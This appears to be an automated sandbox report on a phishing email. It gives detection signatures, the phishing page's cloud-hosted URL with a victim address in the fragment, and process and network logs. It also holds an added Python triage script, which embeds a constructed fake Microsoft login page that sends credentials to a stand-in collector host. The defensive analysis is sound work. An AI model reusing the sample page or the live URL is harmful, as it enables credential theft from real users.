Windows Analysis Report
Fwd_ Payment_Confirmation.msg

Overview

General Information

Sample Name: Fwd_ Payment_Confirmation.msg
Analysis ID: 756146
MD5: 4cfb650a9f6716e65b12578ad7357869
SHA1: 78b9efaf0c5436a04ab38b456ad935507359c7f8
SHA256: 25a3dbaae7f8949703add1c993037243f3b149c7a220eb4e5878e860976b87e0

Detection

HTMLPhisher
Score: 56
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Misleading page title found
Yara detected HtmlPhish10
HTML body contains low number of good links
Invalid T&C link found
No HTML title found

Classification

Phishing

Source: https://30-11-vjwerg9-80eu5rht-0ghjwr-0gfhwe-0r98gf.obs.ap-southeast-1.myhuaweicloud.com/hg084e5trh-ghewr8uinfv-we0r8hgb-0rhgf-rg.htm?AWSAccessKeyId=BRMRSNWPZ46HN5N4CQ0R&Expires=1669808553&Signature=BuuhlTMKcaFhD8DBKX3w/0IwY4s%3D#franco.bin@cuzziol.it Page Title: Microsoft | Login
Source: Yara match File source: 92753.0.pages.csv, type: HTML
Source: https://30-11-vjwerg9-80eu5rht-0ghjwr-0gfhwe-0r98gf.obs.ap-southeast-1.myhuaweicloud.com/hg084e5trh-ghewr8uinfv-we0r8hgb-0rhgf-rg.htm?AWSAccessKeyId=BRMRSNWPZ46HN5N4CQ0R&Expires=1669808553&Signature=BuuhlTMKcaFhD8DBKX3w/0IwY4s%3D#franco.bin@cuzziol.it HTTP Parser: Number of links: 0
Source: https://30-11-vjwerg9-80eu5rht-0ghjwr-0gfhwe-0r98gf.obs.ap-southeast-1.myhuaweicloud.com/hg084e5trh-ghewr8uinfv-we0r8hgb-0rhgf-rg.htm?AWSAccessKeyId=BRMRSNWPZ46HN5N4CQ0R&Expires=1669808553&Signature=BuuhlTMKcaFhD8DBKX3w/0IwY4s%3D#franco.bin@cuzziol.it HTTP Parser: Invalid link: Privacy statement
Source: https://30-11-vjwerg9-80eu5rht-0ghjwr-0gfhwe-0r98gf.obs.ap-southeast-1.myhuaweicloud.com/hg084e5trh-ghewr8uinfv-we0r8hgb-0rhgf-rg.htm?AWSAccessKeyId=BRMRSNWPZ46HN5N4CQ0R&Expires=1669808553&Signature=BuuhlTMKcaFhD8DBKX3w/0IwY4s%3D#franco.bin@cuzziol.it HTTP Parser: HTML title missing
Source: https://30-11-vjwerg9-80eu5rht-0ghjwr-0gfhwe-0r98gf.obs.ap-southeast-1.myhuaweicloud.com/hg084e5trh-ghewr8uinfv-we0r8hgb-0rhgf-rg.htm?AWSAccessKeyId=BRMRSNWPZ46HN5N4CQ0R&Expires=1669808553&Signature=BuuhlTMKcaFhD8DBKX3w/0IwY4s%3D#franco.bin@cuzziol.it HTTP Parser: No <meta name="author".. found
Source: https://30-11-vjwerg9-80eu5rht-0ghjwr-0gfhwe-0r98gf.obs.ap-southeast-1.myhuaweicloud.com/hg084e5trh-ghewr8uinfv-we0r8hgb-0rhgf-rg.htm?AWSAccessKeyId=BRMRSNWPZ46HN5N4CQ0R&Expires=1669808553&Signature=BuuhlTMKcaFhD8DBKX3w/0IwY4s%3D#franco.bin@cuzziol.it HTTP Parser: No <meta name="copyright".. found
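The evidence lines above carry more than the signature names suggest. The page was served from a Huawei Cloud OBS bucket through an S3-style presigned URL (AWSAccessKeyId, Expires and Signature in the query string; Expires is a Unix timestamp, and any change to the path or query invalidates the signature, which is why the same long URL repeats verbatim). The victim address sits in the URL fragment, which browsers never send to the server or to a proxy, so it does not show up in web logs; phishing kits commonly read it from location.hash to prefill the login form, though whether this sample does is not shown in the report. The parser found no static <title> element while the recorded page title is "Microsoft | Login", which points to the title being set at runtime by script. The example below is added here and is not part of the sandbox report: it parses the report's own source URL and re-implements the HTTP Parser heuristics (missing title, misleading brand title, few good links, invalid Terms/Privacy links, missing meta author/copyright) over a constructed look-alike page. SAMPLE_HTML, the brand host allow-list and the good-link threshold are assumptions; the real page's HTML is not on this page.

```python
"""Static phishing-page triage mirroring the report's HTTP Parser signatures.
Added example, not part of the sandbox report. SAMPLE_URL is the report's own
source URL; SAMPLE_HTML is a constructed look-alike, thresholds are assumptions."""
import re
from datetime import datetime, timezone
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

SAMPLE_URL = ("https://30-11-vjwerg9-80eu5rht-0ghjwr-0gfhwe-0r98gf.obs.ap-southeast-1"
              ".myhuaweicloud.com/hg084e5trh-ghewr8uinfv-we0r8hgb-0rhgf-rg.htm"
              "?AWSAccessKeyId=BRMRSNWPZ46HN5N4CQ0R&Expires=1669808553"
              "&Signature=BuuhlTMKcaFhD8DBKX3w/0IwY4s%3D#franco.bin@cuzziol.it")

# Constructed look-alike (NOT the sample's page): no <title>, title set from
# script, victim address read from location.hash, footer links that go nowhere.
SAMPLE_HTML = """<!DOCTYPE html><html><head><meta charset="utf-8">
<script>document.title = "Microsoft | Login";</script></head><body>
<h1>Sign in</h1>
<form method="post" action="https://collector.example.invalid/post">
<input id="email" name="email"><input type="password" name="pass"><button>Next</button></form>
<script>document.getElementById("email").value = decodeURIComponent(location.hash.slice(1));</script>
<footer><a href="#">Terms of use</a> <a href="javascript:void(0)">Privacy statement</a></footer>
</body></html>"""

BRAND_HOSTS = ("login.microsoftonline.com", "login.live.com", "microsoft.com")  # assumed allow-list
BRAND_WORDS = ("microsoft", "office 365", "outlook", "onedrive")
PRESIGNED_KEYS = ("AWSAccessKeyId", "Expires", "Signature")  # S3-style query signing
EMAIL_RE = re.compile(r"[\w.%+-]+@[\w.-]+\.[A-Za-z]{2,}")
GOOD_LINK_MIN = 2  # assumed threshold for "low number of good links"


def analyze_url(url):
    """Delivery details: object-storage host, presigned params, expiry, fragment-borne victim."""
    p = urlsplit(url)
    qs = parse_qs(p.query)
    expires = None
    if qs.get("Expires", [""])[0].isdigit():
        expires = datetime.fromtimestamp(int(qs["Expires"][0]), tz=timezone.utc).isoformat()
    victim = EMAIL_RE.search(p.fragment)  # fragments never reach the server or proxy logs
    return {
        "host": p.hostname,
        "object_storage": any(s in p.hostname for s in (".obs.", ".s3.", ".blob.")),
        "presigned": all(k in qs for k in PRESIGNED_KEYS),
        "expires_utc": expires,
        "victim_in_fragment": victim.group(0) if victim else None,
    }


class _Page(HTMLParser):
    """Collects <title>, anchors (href, text), named <meta> tags and visible text."""
    def __init__(self):
        super().__init__()
        self.title, self.links, self.metas, self.text = None, [], set(), []
        self._in_title = self._in_a = self._in_script = False
        self._href, self._atext = None, []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "title":
            self._in_title = True
        elif tag == "script":
            self._in_script = True
        elif tag == "a":
            self._in_a, self._href, self._atext = True, a.get("href"), []
        elif tag == "meta" and a.get("name"):
            self.metas.add(a["name"].lower())

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False
        elif tag == "script":
            self._in_script = False
        elif tag == "a" and self._in_a:
            self.links.append((self._href, "".join(self._atext).strip()))
            self._in_a = False

    def handle_data(self, data):
        if self._in_title:
            self.title = (self.title or "") + data
        if self._in_a:
            self._atext.append(data)
        if not self._in_script:  # script bodies are not visible text
            self.text.append(data)


def is_invalid_link(href):
    """Anchors that cannot leave the page: empty, '#...' or javascript: targets."""
    h = (href or "").strip().lower()
    return h == "" or h.startswith("#") or h.startswith("javascript:")


def analyze_html(html, host):
    """Return the triggered signature names plus the facts behind them."""
    page = _Page()
    page.feed(html)
    m = re.search(r"""document\.title\s*=\s*["']([^"']*)["']""", html)
    runtime_title = m.group(1) if m else None
    title = (page.title or runtime_title or "").strip()
    visible = " ".join(t.strip() for t in page.text).lower()
    bad = [(h, t) for h, t in page.links if is_invalid_link(h)]
    good = [(h, t) for h, t in page.links if not is_invalid_link(h)]
    on_brand_host = any(host == b or host.endswith("." + b) for b in BRAND_HOSTS)
    sigs = []
    if page.title is None:
        sigs.append("No HTML title found")
    if any(w in title.lower() or w in visible for w in BRAND_WORDS) and not on_brand_host:
        sigs.append("Misleading page title found")
    if len(good) < GOOD_LINK_MIN:
        sigs.append("HTML body contains low number of good links")
    if any(re.search(r"privacy|terms|t&c", t.lower()) for _, t in bad):
        sigs.append("Invalid T&C link found")
    sigs += [f'No <meta name="{n}"> found' for n in ("author", "copyright") if n not in page.metas]
    return {"static_title": page.title, "runtime_title": runtime_title, "good_links": len(good),
            "invalid_links": bad, "signatures": sigs}


if __name__ == "__main__":
    info = analyze_url(SAMPLE_URL)
    print(info)
    print(analyze_html(SAMPLE_HTML, info["host"]))
```

Running it on the report's URL gives a presigned link expiring 2022-11-30 11:42:33 UTC (the day after the analysis timestamp in the Outlook log filename below) and the victim address from the fragment; the constructed page trips all five parser signatures listed in the report. For triage, the expiry and the bucket host are the useful pivots: the bucket name is disposable, but the presigned access key ID in the query string stays constant across every link minted with it.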
Source: chrome.exe Memory has grown: Private usage: 0MB later: 28MB
Source: unknown DNS traffic detected: queries for: clients2.google.com
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1 (11 occurrences)
Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE File created: C:\Users\alfredo\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_13929_20386-20221129T1749280939-2572.etl
Source: classification engine Classification label: mal56.phis.winMSG@24/2@11/218
Source: unknown Process created: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\alfredo\Desktop\Fwd_ Payment_Confirmation.msg"
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\alfredo\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\IRQ7T0GH\Payment_Confirmation.hTm
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1792,i,11491005883064114037,15152354911059901904,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown (17 occurrences)
Source: unknown Process created: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" -Embedding
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown (2 occurrences)
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX